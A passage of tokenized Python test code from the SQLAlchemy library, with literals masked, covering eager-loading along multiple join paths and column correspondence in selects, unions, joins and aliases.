primary_key = True ) <EOL> b_id = Column ( ForeignKey ( '<STR_LIT>' ) ) <EOL> c_id = Column ( ForeignKey ( '<STR_LIT>' ) ) <EOL> b = relationship ( "<STR_LIT:B>" ) <EOL> c = relationship ( "<STR_LIT:C>" ) <EOL> class B ( Base ) : <EOL> __tablename__ = '<STR_LIT:b>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> c_id = Column ( ForeignKey ( '<STR_LIT>' ) ) <EOL> c = relationship ( "<STR_LIT:C>" ) <EOL> class C ( Base ) : <EOL> __tablename__ = '<STR_LIT:c>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> d_id = Column ( ForeignKey ( '<STR_LIT>' ) ) <EOL> d = relationship ( "<STR_LIT:D>" ) <EOL> class D ( Base ) : <EOL> __tablename__ = '<STR_LIT:d>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> Table ( <EOL> '<STR_LIT:a>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) ) <EOL> ) <EOL> def test_multi_path_load ( self ) : <EOL> A , B , C , D = self . classes ( '<STR_LIT:A>' , '<STR_LIT:B>' , '<STR_LIT:C>' , '<STR_LIT:D>' ) <EOL> s = Session ( ) <EOL> c = C ( d = D ( ) ) <EOL> s . add ( <EOL> A ( b = B ( c = c ) , c = c ) <EOL> ) <EOL> s . commit ( ) <EOL> c_alias_1 = aliased ( C ) <EOL> c_alias_2 = aliased ( C ) <EOL> q = s . query ( A ) <EOL> q = q . join ( A . b ) . join ( c_alias_1 , B . c ) . join ( c_alias_1 . d ) <EOL> q = q . options ( <EOL> contains_eager ( A . b ) . <EOL> contains_eager ( B . c , alias = c_alias_1 ) . <EOL> contains_eager ( C . d ) ) <EOL> q = q . join ( c_alias_2 , A . c ) <EOL> q = q . options ( contains_eager ( A . c , alias = c_alias_2 ) ) <EOL> a1 = q . all ( ) [ <NUM_LIT:0> ] <EOL> in_ ( '<STR_LIT:d>' , a1 . c . __dict__ ) <EOL> class EntityViaMultiplePathTestTwo ( fixtures . DeclarativeMappedTest ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def setup_classes ( cls ) : <EOL> Base = cls . DeclarativeBasic <EOL> class User ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> data = Column ( Integer ) <EOL> class LD ( Base ) : <EOL> """<STR_LIT>""" <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> user_id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> user = relationship ( User , primaryjoin = user_id == User . id ) <EOL> class A ( Base ) : <EOL> """<STR_LIT>""" <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> ld_id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> ld = relationship ( LD , primaryjoin = ld_id == LD . id ) <EOL> class LDA ( Base ) : <EOL> """<STR_LIT>""" <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> ld_id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> a_id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> a = relationship ( A , primaryjoin = a_id == A . id ) <EOL> ld = relationship ( LD , primaryjoin = ld_id == LD . id ) <EOL> def test_multi_path_load ( self ) : <EOL> User , LD , A , LDA = self . classes ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:A>' , '<STR_LIT>' ) <EOL> s = Session ( ) <EOL> u0 = User ( data = <NUM_LIT> ) <EOL> l0 = LD ( user = u0 ) <EOL> z0 = A ( ld = l0 ) <EOL> lz0 = LDA ( ld = l0 , a = z0 ) <EOL> s . add_all ( [ <EOL> u0 , l0 , z0 , lz0 <EOL> ] ) <EOL> s . commit ( ) <EOL> l_ac = aliased ( LD ) <EOL> u_ac = aliased ( User ) <EOL> lz_test = ( s . query ( LDA ) <EOL> . join ( '<STR_LIT>' ) <EOL> . options ( contains_eager ( '<STR_LIT>' ) ) <EOL> . join ( '<STR_LIT:a>' , ( l_ac , '<STR_LIT>' ) , ( u_ac , '<STR_LIT:user>' ) ) <EOL> . options ( contains_eager ( '<STR_LIT:a>' ) <EOL> . contains_eager ( '<STR_LIT>' , alias = l_ac ) <EOL> . contains_eager ( '<STR_LIT:user>' , alias = u_ac ) ) <EOL> . first ( ) ) <EOL> in_ ( <EOL> '<STR_LIT:user>' , lz_test . a . ld . __dict__ <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from sqlalchemy . testing import eq_ , assert_raises , assert_raises_message , is_ <EOL> from sqlalchemy import * <EOL> from sqlalchemy . testing import fixtures , AssertsCompiledSQL , AssertsExecutionResults <EOL> from sqlalchemy . sql import elements <EOL> from sqlalchemy import testing <EOL> from sqlalchemy . sql import util as sql_util , visitors , expression <EOL> from sqlalchemy import exc <EOL> from sqlalchemy . sql import table , column , null <EOL> from sqlalchemy import util <EOL> from sqlalchemy . schema import Column , Table , MetaData <EOL> metadata = MetaData ( ) <EOL> table1 = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:20> ) ) , <EOL> Column ( '<STR_LIT>' , Integer ) , <EOL> Column ( '<STR_LIT>' , Integer ) , <EOL> ) <EOL> table2 = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:20> ) ) , <EOL> Column ( '<STR_LIT>' , Integer ) , <EOL> ) <EOL> keyed = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:x>' , Integer , key = '<STR_LIT>' ) , <EOL> Column ( '<STR_LIT:y>' , Integer , key = '<STR_LIT>' ) , <EOL> Column ( '<STR_LIT:z>' , Integer ) , <EOL> ) <EOL> class SelectableTest ( <EOL> fixtures . TestBase , <EOL> AssertsExecutionResults , <EOL> AssertsCompiledSQL ) : <EOL> __dialect__ = '<STR_LIT:default>' <EOL> def test_indirect_correspondence_on_labels ( self ) : <EOL> s = select ( [ table1 . c . col1 . label ( '<STR_LIT>' ) , table1 . c . col1 , <EOL> table1 . c . col1 . label ( '<STR_LIT>' ) ] ) <EOL> assert s . corresponding_column ( table1 . c . col1 ) is s . c . col1 <EOL> assert s . corresponding_column ( s . c . col1 ) is s . c . col1 <EOL> assert s . corresponding_column ( s . c . c1 ) is s . c . c1 <EOL> def test_labeled_subquery_twice ( self ) : <EOL> scalar_select = select ( [ table1 . c . col1 ] ) . label ( '<STR_LIT:foo>' ) <EOL> s1 = select ( [ scalar_select ] ) <EOL> s2 = select ( [ scalar_select , scalar_select ] ) <EOL> eq_ ( <EOL> s1 . c . foo . proxy_set , <EOL> set ( [ s1 . c . foo , scalar_select , scalar_select . element ] ) <EOL> ) <EOL> eq_ ( <EOL> s2 . c . foo . proxy_set , <EOL> set ( [ s2 . c . foo , scalar_select , scalar_select . element ] ) <EOL> ) <EOL> assert s1 . corresponding_column ( scalar_select ) is s1 . c . foo <EOL> assert s2 . corresponding_column ( scalar_select ) is s2 . c . foo <EOL> def test_label_grouped_still_corresponds ( self ) : <EOL> label = select ( [ table1 . c . col1 ] ) . label ( '<STR_LIT:foo>' ) <EOL> label2 = label . self_group ( ) <EOL> s1 = select ( [ label ] ) <EOL> s2 = select ( [ label2 ] ) <EOL> assert s1 . corresponding_column ( label ) is s1 . c . foo <EOL> assert s2 . corresponding_column ( label ) is s2 . c . foo <EOL> def test_direct_correspondence_on_labels ( self ) : <EOL> l1 , l2 = table1 . c . col1 . label ( '<STR_LIT:foo>' ) , table1 . c . col1 . label ( '<STR_LIT:bar>' ) <EOL> sel = select ( [ l1 , l2 ] ) <EOL> sel2 = sel . alias ( ) <EOL> assert sel2 . corresponding_column ( l1 ) is sel2 . c . foo <EOL> assert sel2 . corresponding_column ( l2 ) is sel2 . c . bar <EOL> sel2 = select ( [ table1 . c . col1 . label ( '<STR_LIT:foo>' ) , table1 . c . col2 . label ( '<STR_LIT:bar>' ) ] ) <EOL> sel3 = sel . union ( sel2 ) . alias ( ) <EOL> assert sel3 . corresponding_column ( l1 ) is sel3 . c . foo <EOL> assert sel3 . corresponding_column ( l2 ) is sel3 . c . bar <EOL> def test_keyed_gen ( self ) : <EOL> s = select ( [ keyed ] ) <EOL> eq_ ( s . c . colx . key , '<STR_LIT>' ) <EOL> eq_ ( s . c . colx . name , '<STR_LIT:x>' ) <EOL> assert s . corresponding_column ( keyed . c . colx ) is s . c . colx <EOL> assert s . corresponding_column ( keyed . c . coly ) is s . c . coly <EOL> assert s . corresponding_column ( keyed . c . z ) is s . c . z <EOL> sel2 = s . alias ( ) <EOL> assert sel2 . corresponding_column ( keyed . c . colx ) is sel2 . c . colx <EOL> assert sel2 . corresponding_column ( keyed . c . coly ) is sel2 . c . coly <EOL> assert sel2 . corresponding_column ( keyed . c . z ) is sel2 . c . z <EOL> def test_keyed_label_gen ( self ) : <EOL> s = select ( [ keyed ] ) . apply_labels ( ) <EOL> assert s . corresponding_column ( keyed . c . colx ) is s . c . keyed_colx <EOL> assert s . corresponding_column ( keyed . c . coly ) is s . c . keyed_coly <EOL> assert s . corresponding_column ( keyed . c . z ) is s . c . keyed_z <EOL> sel2 = s . alias ( ) <EOL> assert sel2 . corresponding_column ( keyed . c . colx ) is sel2 . c . keyed_colx <EOL> assert sel2 . corresponding_column ( keyed . c . coly ) is sel2 . c . keyed_coly <EOL> assert sel2 . corresponding_column ( keyed . c . z ) is sel2 . c . keyed_z <EOL> def test_keyed_c_collection_upper ( self ) : <EOL> c = Column ( '<STR_LIT:foo>' , Integer , key = '<STR_LIT:bar>' ) <EOL> t = Table ( '<STR_LIT:t>' , MetaData ( ) , c ) <EOL> is_ ( t . c . bar , c ) <EOL> def test_keyed_c_collection_lower ( self ) : <EOL> c = column ( '<STR_LIT:foo>' ) <EOL> c . key = '<STR_LIT:bar>' <EOL> t = table ( '<STR_LIT:t>' , c ) <EOL> is_ ( t . c . bar , c ) <EOL> def test_clone_c_proxy_key_upper ( self ) : <EOL> c = Column ( '<STR_LIT:foo>' , Integer , key = '<STR_LIT:bar>' ) <EOL> t = Table ( '<STR_LIT:t>' , MetaData ( ) , c ) <EOL> s = select ( [ t ] ) . _clone ( ) <EOL> assert c in s . c . bar . proxy_set <EOL> def test_clone_c_proxy_key_lower ( self ) : <EOL> c = column ( '<STR_LIT:foo>' ) <EOL> c . key = '<STR_LIT:bar>' <EOL> t = table ( '<STR_LIT:t>' , c ) <EOL> s = select ( [ t ] ) . _clone ( ) <EOL> assert c in s . c . bar . proxy_set <EOL> def test_no_error_on_unsupported_expr_key ( self ) : <EOL> from sqlalchemy . sql . expression import BinaryExpression <EOL> def myop ( x , y ) : <EOL> pass <EOL> t = table ( '<STR_LIT:t>' , column ( '<STR_LIT:x>' ) , column ( '<STR_LIT:y>' ) ) <EOL> expr = BinaryExpression ( t . c . x , t . c . y , myop ) <EOL> s = select ( [ t , expr ] ) <EOL> eq_ ( <EOL> s . c . keys ( ) , <EOL> [ '<STR_LIT:x>' , '<STR_LIT:y>' , expr . anon_label ] <EOL> ) <EOL> def test_cloned_intersection ( self ) : <EOL> t1 = table ( '<STR_LIT>' , column ( '<STR_LIT:x>' ) ) <EOL> t2 = table ( '<STR_LIT>' , column ( '<STR_LIT:x>' ) ) <EOL> s1 = t1 . select ( ) <EOL> s2 = t2 . select ( ) <EOL> s3 = t1 . select ( ) <EOL> s1c1 = s1 . _clone ( ) <EOL> s1c2 = s1 . _clone ( ) <EOL> s2c1 = s2 . _clone ( ) <EOL> s3c1 = s3 . _clone ( ) <EOL> eq_ ( <EOL> expression . _cloned_intersection ( <EOL> [ s1c1 , s3c1 ] , [ s2c1 , s1c2 ] <EOL> ) , <EOL> set ( [ s1c1 ] ) <EOL> ) <EOL> def test_cloned_difference ( self ) : <EOL> t1 = table ( '<STR_LIT>' , column ( '<STR_LIT:x>' ) ) <EOL> t2 = table ( '<STR_LIT>' , column ( '<STR_LIT:x>' ) ) <EOL> s1 = t1 . select ( ) <EOL> s2 = t2 . select ( ) <EOL> s3 = t1 . select ( ) <EOL> s1c1 = s1 . _clone ( ) <EOL> s1c2 = s1 . _clone ( ) <EOL> s2c1 = s2 . _clone ( ) <EOL> s2c2 = s2 . _clone ( ) <EOL> s3c1 = s3 . _clone ( ) <EOL> eq_ ( <EOL> expression . _cloned_difference ( <EOL> [ s1c1 , s2c1 , s3c1 ] , [ s2c1 , s1c2 ] <EOL> ) , <EOL> set ( [ s3c1 ] ) <EOL> ) <EOL> def test_distance_on_aliases ( self ) : <EOL> a1 = table1 . alias ( '<STR_LIT>' ) <EOL> for s in ( select ( [ a1 , table1 ] , use_labels = True ) , <EOL> select ( [ table1 , a1 ] , use_labels = True ) ) : <EOL> assert s . corresponding_column ( table1 . c . col1 ) is s . c . table1_col1 <EOL> assert s . corresponding_column ( a1 . c . col1 ) is s . c . a1_col1 <EOL> def test_join_against_self ( self ) : <EOL> jj = select ( [ table1 . c . col1 . label ( '<STR_LIT>' ) ] ) <EOL> jjj = join ( table1 , jj , table1 . c . col1 == jj . c . bar_col1 ) <EOL> assert jjj . corresponding_column ( jjj . c . table1_col1 ) is jjj . c . table1_col1 <EOL> assert jjj . corresponding_column ( jj . c . bar_col1 ) is jjj . c . bar_col1 <EOL> j2 = jjj . alias ( '<STR_LIT:foo>' ) <EOL> assert j2 . corresponding_column ( table1 . c . col1 ) is j2 . c . table1_col1 <EOL> def test_clone_append_column ( self ) : <EOL> sel = select ( [ literal_column ( '<STR_LIT:1>' ) . label ( '<STR_LIT:a>' ) ] ) <EOL> eq_ ( list ( sel . c . keys ( ) ) , [ '<STR_LIT:a>' ] ) <EOL> cloned = visitors . ReplacingCloningVisitor ( ) . traverse ( sel ) <EOL> cloned . append_column ( literal_column ( '<STR_LIT:2>' ) . label ( '<STR_LIT:b>' ) ) <EOL> cloned . append_column ( func . foo ( ) ) <EOL> eq_ ( list ( cloned . c . keys ( ) ) , [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT>' ] ) <EOL> def test_append_column_after_replace_selectable ( self ) : <EOL> basesel = select ( [ literal_column ( '<STR_LIT:1>' ) . label ( '<STR_LIT:a>' ) ] ) <EOL> tojoin = select ( [ <EOL> literal_column ( '<STR_LIT:1>' ) . label ( '<STR_LIT:a>' ) , <EOL> literal_column ( '<STR_LIT:2>' ) . label ( '<STR_LIT:b>' ) <EOL> ] ) <EOL> basefrom = basesel . alias ( '<STR_LIT>' ) <EOL> joinfrom = tojoin . alias ( '<STR_LIT>' ) <EOL> sel = select ( [ basefrom . c . a ] ) <EOL> replaced = sel . replace_selectable ( <EOL> basefrom , <EOL> basefrom . join ( joinfrom , basefrom . c . a == joinfrom . c . a ) <EOL> ) <EOL> self . assert_compile ( <EOL> replaced , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> replaced . append_column ( joinfrom . c . b ) <EOL> self . assert_compile ( <EOL> replaced , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_against_cloned_non_table ( self ) : <EOL> col = func . count ( ) . label ( '<STR_LIT:foo>' ) <EOL> sel = select ( [ col ] ) <EOL> sel2 = visitors . ReplacingCloningVisitor ( ) . traverse ( sel ) <EOL> assert sel2 . corresponding_column ( col ) is sel2 . c . foo <EOL> sel3 = visitors . ReplacingCloningVisitor ( ) . traverse ( sel2 ) <EOL> assert sel3 . corresponding_column ( col ) is sel3 . c . foo <EOL> def test_with_only_generative ( self ) : <EOL> s1 = table1 . select ( ) . as_scalar ( ) <EOL> self . assert_compile ( <EOL> s1 . with_only_columns ( [ s1 ] ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_type_coerce_preserve_subq ( self ) : <EOL> class MyType ( TypeDecorator ) : <EOL> impl = Integer <EOL> stmt = select ( [ type_coerce ( column ( '<STR_LIT:x>' ) , MyType ) . label ( '<STR_LIT:foo>' ) ] ) <EOL> stmt2 = stmt . select ( ) <EOL> assert isinstance ( stmt . _raw_columns [ <NUM_LIT:0> ] . type , MyType ) <EOL> assert isinstance ( stmt . c . foo . type , MyType ) <EOL> assert isinstance ( stmt2 . c . foo . type , MyType ) <EOL> def test_select_on_table ( self ) : <EOL> sel = select ( [ table1 , table2 ] , use_labels = True ) <EOL> assert sel . corresponding_column ( table1 . c . col1 ) is sel . c . table1_col1 <EOL> assert sel . corresponding_column ( <EOL> table1 . c . col1 , <EOL> require_embedded = True ) is sel . c . table1_col1 <EOL> assert table1 . corresponding_column ( sel . c . table1_col1 ) is table1 . c . col1 <EOL> assert table1 . corresponding_column ( sel . c . table1_col1 , <EOL> require_embedded = True ) is None <EOL> def test_join_against_join ( self ) : <EOL> j = outerjoin ( table1 , table2 , table1 . c . col1 == table2 . c . col2 ) <EOL> jj = select ( [ table1 . c . col1 . label ( '<STR_LIT>' ) ] , <EOL> from_obj = [ j ] ) . alias ( '<STR_LIT:foo>' ) <EOL> jjj = join ( table1 , jj , table1 . c . col1 == jj . c . bar_col1 ) <EOL> assert jjj . corresponding_column ( jjj . c . table1_col1 ) is jjj . c . table1_col1 <EOL> j2 = jjj . alias ( '<STR_LIT:foo>' ) <EOL> assert j2 . corresponding_column ( jjj . c . table1_col1 ) is j2 . c . table1_col1 <EOL> assert jjj . corresponding_column ( jj . c . bar_col1 ) is jj . c . bar_col1 <EOL> def test_table_alias ( self ) : <EOL> a = table1 . alias ( '<STR_LIT:a>' ) <EOL> j = join ( a , table2 ) <EOL> criterion = a . c . col1 == table2 . c . col2 <EOL> self . assert_ ( criterion . compare ( j . onclause ) ) <EOL> def test_union ( self ) : <EOL> u = select ( [ table1 . c . col1 , <EOL> table1 . c . col2 , <EOL> table1 . c . col3 , <EOL> table1 . c . colx , <EOL> null ( ) . label ( '<STR_LIT>' ) ] ) . union ( select ( [ table2 . c . col1 , <EOL> table2 . c . col2 , <EOL> table2 . c . col3 , <EOL> null ( ) . label ( '<STR_LIT>' ) , <EOL> table2 . c . coly ] ) ) <EOL> s1 = table1 . select ( use_labels = True ) <EOL> s2 = table2 . select ( use_labels = True ) <EOL> assert u . corresponding_column ( s1 . c . table1_col2 ) is u . c . col2 <EOL> assert u . corresponding_column ( s2 . c . table2_col2 ) is u . c . col2 <EOL> def test_union_precedence ( self ) : <EOL> s1 = select ( [ table1 . c . col1 , table1 . c . col2 ] ) <EOL> s2 = select ( [ table1 . c . col2 , table1 . c . col1 ] ) <EOL> s3 = select ( [ table1 . c . col3 , table1 . c . colx ] ) <EOL> s4 = select ( [ table1 . c . colx , table1 . c . col3 ] ) <EOL> u1 = union ( s1 , s2 ) <EOL> assert u1 . corresponding_column ( table1 . c . col1 ) is u1 . c . col1 <EOL> assert u1 . corresponding_column ( table1 . c . col2 ) is u1 . c . col2 <EOL> u1 = union ( s1 , s2 , s3 , s4 ) <EOL> assert u1 . corresponding_column ( table1 . c . col1 ) is u1 . c . col1 <EOL> assert u1 . corresponding_column ( table1 . c . col2 ) is u1 . c . col2 <EOL> assert u1 . corresponding_column ( table1 . c . colx ) is u1 . c . col2 <EOL> assert u1 . corresponding_column ( table1 . c . col3 ) is u1 . c . col1 <EOL> def test_singular_union ( self ) : <EOL> u = union ( select ( [ table1 . c . col1 , table1 . c . col2 , table1 . c . col3 ] ) , select ( <EOL> [ table1 . c . col1 , table1 . c . col2 , table1 . c . col3 ] ) ) <EOL> u = union ( select ( [ table1 . c . col1 , table1 . c . col2 , table1 . c . col3 ] ) ) <EOL> assert u . c . col1 is not None <EOL> assert u . c . col2 is not None <EOL> assert u . c . col3 is not None <EOL> def test_alias_union ( self ) : <EOL> u = select ( [ table1 . c . col1 , <EOL> table1 . c . col2 , <EOL> table1 . c . col3 , <EOL> table1 . c . colx , <EOL> null ( ) . label ( '<STR_LIT>' ) ] ) . union ( select ( [ table2 . c . col1 , <EOL> table2 . c . col2 , <EOL> table2 . c . col3 , <EOL> null ( ) . label ( '<STR_LIT>' ) , <EOL> table2 . c . coly ] ) ) . alias ( '<STR_LIT>' ) <EOL> s1 = table1 . select ( use_labels = True ) <EOL> s2 = table2 . select ( use_labels = True ) <EOL> assert u . corresponding_column ( s1 . c . table1_col2 ) is u . c . col2 <EOL> assert u . corresponding_column ( s2 . c . table2_col2 ) is u . c . col2 <EOL> assert u . corresponding_column ( s2 . c . table2_coly ) is u . c . coly <EOL> assert s2 . corresponding_column ( u . c . coly ) is s2 . c . table2_coly <EOL> def test_union_of_alias ( self ) : <EOL> s1 = select ( [ table1 . c . col1 , table1 . c . col2 ] ) <EOL> s2 = select ( [ table1 . c . col1 , table1 . c . col2 ] ) . alias ( ) <EOL> u1 = union ( s1 , s2 ) <EOL> assert u1 . corresponding_column ( s1 . c . col1 ) is u1 . c . col1 <EOL> assert u1 . corresponding_column ( s2 . c . col1 ) is u1 . c . col1 <EOL> u2 = union ( s2 , s1 ) <EOL> assert u2 . corresponding_column ( s1 . c . col1 ) is u2 . c . col1 <EOL> assert u2 . corresponding_column ( s2 . c . col1 ) is u2 . c . col1 <EOL> def test_union_of_text ( self ) : <EOL> s1 = select ( [ table1 . c . col1 , table1 . c . col2 ] ) <EOL> s2 = text ( "<STR_LIT>" ) . columns ( <EOL> column ( '<STR_LIT>' ) , column ( '<STR_LIT>' ) ) <EOL> u1 = union ( s1 , s2 ) <EOL> assert u1 . corresponding_column ( s1 . c . col1 ) is u1 . c . col1 <EOL> assert u1 . corresponding_column ( s2 . c . col1 ) is u1 . c . col1 <EOL> u2 = union ( s2 , s1 ) <EOL> assert u2 . corresponding_column ( s1 . c . col1 ) is u2 . c . col1 <EOL> assert u2 . corresponding_column ( s2 . c . col1 ) is u2 . c . col1 <EOL> @ testing . emits_warning ( "<STR_LIT>" ) <EOL> def test_union_dupe_keys ( self ) : <EOL> s1 = select ( [ table1 . c . col1 , table1 . c . col2 , table2 . c . col1 ] ) <EOL> s2 = select ( [ table2 . c . col1 , table2 . c . col2 , table2 . c . col3 ] ) <EOL> u1 = union ( s1 , s2 ) <EOL> assert u1 . corresponding_column ( <EOL> s1 . c . _all_columns [ <NUM_LIT:0> ] ) is u1 . c . _all_columns [ <NUM_LIT:0> ] <EOL> assert u1 . corresponding_column ( s2 . c . col1 ) is u1 . c . _all_columns [ <NUM_LIT:0> ] <EOL> assert u1 . corresponding_column ( s1 . c . col2 ) is u1 . c . col2 <EOL> assert u1 . corresponding_column ( s2 . c . col2 ) is u1 . c . col2 <EOL> assert u1 . corresponding_column ( s2 . c . col3 ) is u1 . c . _all_columns [ <NUM_LIT:2> ] <EOL> assert u1 . corresponding_column ( table2 . c . col1 ) is u1 . c . _all_columns [ <NUM_LIT:2> ] <EOL> assert u1 . corresponding_column ( table2 . c . col3 ) is u1 . c . _all_columns [ <NUM_LIT:2> ] <EOL> @ testing . emits_warning ( "<STR_LIT>" ) <EOL> def test_union_alias_dupe_keys ( self ) : <EOL> s1 = select ( [ table1 . c . col1 , table1 . c . col2 , table2 . c . col1 ] ) . alias ( ) <EOL> s2 = select ( [ table2 . c . col1 , table2 . c . col2 , table2 . c . col3 ] ) <EOL> u1 = union ( s1 , s2 ) <EOL> assert u1 . corresponding_column ( <EOL> s1 . c . _all_columns [ <NUM_LIT:0> ] ) is u1 . c . _all_columns [ <NUM_LIT:0> ] <EOL> assert u1 . corresponding_column ( s2 . c . col1 ) is u1 . c . _all_columns [ <NUM_LIT:0> ] <EOL> assert u1 . corresponding_column ( s1 . c . col2 ) is u1 . c . col2 <EOL> assert u1 . corresponding_column ( s2 . c . col2 ) is u1 . c . col2 <EOL> assert u1 . corresponding_column ( s2 . c . col3 ) is u1 . c . _all_columns [ <NUM_LIT:2> ] <EOL> assert u1 . corresponding_column ( table2 . c . col1 ) is u1 . c . _all_columns [ <NUM_LIT:0> ] <EOL> assert u1 . corresponding_column ( table2 . c . col3 ) is u1 . c . _all_columns [ <NUM_LIT:2> ] <EOL> @ testing . emits_warning ( "<STR_LIT>" ) <EOL> def test_union_alias_dupe_keys_grouped ( self ) : <EOL> s1 = select ( [ table1 . c . col1 , table1 . c . col2 , table2 . c . col1 ] ) . limit ( <NUM_LIT:1> ) . alias ( ) <EOL> s2 = select ( [ table2 . c . col1 , table2 . c . col2 , table2 . c . col3 ] ) . limit ( <NUM_LIT:1> ) <EOL> u1 = union ( s1 , s2 ) <EOL> assert u1 . corresponding_column ( <EOL> s1 . c . _all_columns [ <NUM_LIT:0> ] ) is u1 . c . _all_columns [ <NUM_LIT:0> ] <EOL> assert u1 . corresponding_column ( s2 . c . col1 ) is u1 . c . _all_columns [ <NUM_LIT:0> ] <EOL> assert u1 . corresponding_column ( s1 . c . col2 ) is u1 . c . col2 <EOL> assert u1 . corresponding_column ( s2 . c . col2 ) is u1 . c . col2 <EOL> assert u1 . corresponding_column ( s2 . c . col3 ) is u1 . c . _all_columns [ <NUM_LIT:2> ] <EOL> assert u1 . corresponding_column ( table2 . c . col1 ) is u1 . c . _all_columns [ <NUM_LIT:0> ] <EOL> assert u1 . corresponding_column ( table2 . c . col3 ) is u1 . c . _all_columns [ <NUM_LIT:2> ] <EOL> def test_select_union ( self ) : <EOL> u = select ( [ table1 . c . col1 , <EOL> table1 . c . col2 , <EOL> table1 . c . col3 , <EOL> table1 . c . colx , <EOL> null ( ) . label ( '<STR_LIT>' ) ] ) . union ( select ( [ table2 . c . col1 , <EOL> table2 . c . col2 , <EOL> table2 . c . col3 , <EOL> null ( ) . label ( '<STR_LIT>' ) , <EOL> table2 . c . coly ] ) ) . alias ( '<STR_LIT>' ) <EOL> s = select ( [ u ] ) <EOL> s1 = table1 . select ( use_labels = True ) <EOL> s2 = table2 . select ( use_labels = True ) <EOL> assert s . corresponding_column ( s1 . c . table1_col2 ) is s . c . col2 <EOL> assert s . corresponding_column ( s2 . c . table2_col2 ) is s . c . col2 <EOL> def test_union_against_join ( self ) : <EOL> u = select ( [ table1 . c . col1 , <EOL> table1 . c . col2 , <EOL> table1 . c . col3 , <EOL> table1 . c . colx , <EOL> null ( ) . label ( '<STR_LIT>' ) ] ) . union ( select ( [ table2 . c . col1 , <EOL> table2 . c . col2 , <EOL> table2 . c . col3 , <EOL> null ( ) . label ( '<STR_LIT>' ) , <EOL> table2 . c . coly ] ) ) . alias ( '<STR_LIT>' ) <EOL> j1 = table1 . join ( table2 ) <EOL> assert u . corresponding_column ( j1 . c . table1_colx ) is u . c . colx <EOL> assert j1 . corresponding_column ( u . c . colx ) is j1 . c . table1_colx <EOL> def test_join ( self ) : <EOL> a = join ( table1 , table2 ) <EOL> print ( str ( a . select ( use_labels = True ) ) ) <EOL> b = table2 . alias ( '<STR_LIT:b>' ) <EOL> j = join ( a , b ) <EOL> print ( str ( j ) ) <EOL> criterion = a . c . table1_col1 == b . c . col2 <EOL> self . assert_ ( criterion . compare ( j . onclause ) ) <EOL> def test_select_alias ( self ) : <EOL> a = table1 . select ( ) . alias ( '<STR_LIT:a>' ) <EOL> j = join ( a , table2 ) <EOL> criterion = a . c . col1 == table2 . c . col2 <EOL> self . assert_ ( criterion . compare ( j . onclause ) ) <EOL> def test_select_labels ( self ) : <EOL> a = table1 . select ( use_labels = True ) <EOL> j = join ( a , table2 ) <EOL> criterion = a . c . table1_col1 == table2 . c . col2 <EOL> self . assert_ ( criterion . compare ( j . onclause ) ) <EOL> def test_scalar_cloned_comparator ( self ) : <EOL> sel = select ( [ table1 . c . col1 ] ) . as_scalar ( ) <EOL> expr = sel == table1 . c . col1 <EOL> sel2 = visitors . ReplacingCloningVisitor ( ) . traverse ( sel ) <EOL> expr2 = sel2 == table1 . c . col1 <EOL> is_ ( expr2 . left , sel2 ) <EOL> def test_column_labels ( self ) : <EOL> a = select ( [ table1 . c . col1 . label ( '<STR_LIT>' ) , <EOL> table1 . c . col2 . label ( '<STR_LIT>' ) , <EOL> table1 . c . col3 . label ( '<STR_LIT>' ) ] ) <EOL> j = join ( a , table2 ) <EOL> criterion = a . c . acol1 == table2 . c . col2 <EOL> self . assert_ ( criterion . compare ( j . onclause ) ) <EOL> def test_labeled_select_correspoinding ( self ) : <EOL> l1 = select ( [ func . max ( table1 . c . col1 ) ] ) . label ( '<STR_LIT:foo>' ) <EOL> s = select ( [ l1 ] ) <EOL> eq_ ( s . corresponding_column ( l1 ) , s . c . foo ) <EOL> s = select ( [ table1 . c . col1 , l1 ] ) <EOL> eq_ ( s . corresponding_column ( l1 ) , s . c . foo ) <EOL> def test_select_alias_labels ( self ) : <EOL> a = table2 . select ( use_labels = True ) . alias ( '<STR_LIT:a>' ) <EOL> j = join ( a , table1 ) <EOL> criterion = table1 . c . col1 == a . c . table2_col2 <EOL> self . assert_ ( criterion . compare ( j . onclause ) ) <EOL> def test_table_joined_to_select_of_table ( self ) : <EOL> metadata = MetaData ( ) <EOL> a = Table ( '<STR_LIT:a>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) ) <EOL> j2 = select ( [ a . c . id . label ( '<STR_LIT>' ) ] ) . alias ( '<STR_LIT:bar>' ) <EOL> j3 = a . join ( j2 , j2 . c . aid == a . c . id ) <EOL> j4 = select ( [ j3 ] ) . alias ( '<STR_LIT:foo>' ) <EOL> assert j4 . corresponding_column ( j2 . c . aid ) is j4 . c . aid 